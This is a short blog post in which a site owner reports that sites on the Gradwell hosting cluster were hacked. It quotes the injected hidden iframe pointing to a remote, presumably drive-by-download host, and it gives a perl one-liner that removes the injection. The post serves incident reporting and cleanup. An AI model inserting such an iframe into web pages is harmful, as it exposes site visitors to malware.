I woke up this morning to find all my clients' sites hosted at Gradwell have been hacked.
A quick poke around on domainsbyip.com shows that many other sites hosted on Gradwell's cluster have been similarly altered.
The hacker has added some HTML for a hidden iframe which points to a remote site. Presumably this site serves some sort of drive-by download attack.
Here's the code that is either prepended or appended to all .php and .html files:
<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/" style="display:none"></iframe>
I cleaned up the files as soon as I noticed the attack with this one-liner:
find . -name '*.php' -or -name '*.html' | xargs -n1 perl -pi -e "s/\<iframe src\=\"http\:\/\/gaccess\.dynsite\.net\/blog\/wp-content\/0wn3d\/\" style\=\"display:none\"\>\<\/iframe\>//"
(NB: this should all be on one line)
The files were re-infected an hour or so later. Re-infection seems to have stopped now.
The attacker evidently has access to the entire home directory - not just the apache web root - as library files outside the web root were also affected.
I reported the breach to support and am awaiting the outcome.
Luckily for me, the Primesolid site wasn't affected as I no longer host it at Gradwell.
There's a thread about this on uk.net.providers.gradwell
Peter Gradwell says: there must be some sort of exploit in apache itself so we are also looking at that, and it's permissions model.
Update 2010-12-19 10:03
Gradwell have been hacked again this morning.
Exactly the same attack code has been added to all php and html files. Timestamps are updated to 2010-12-19 05:22. :-/comments powered by Disqus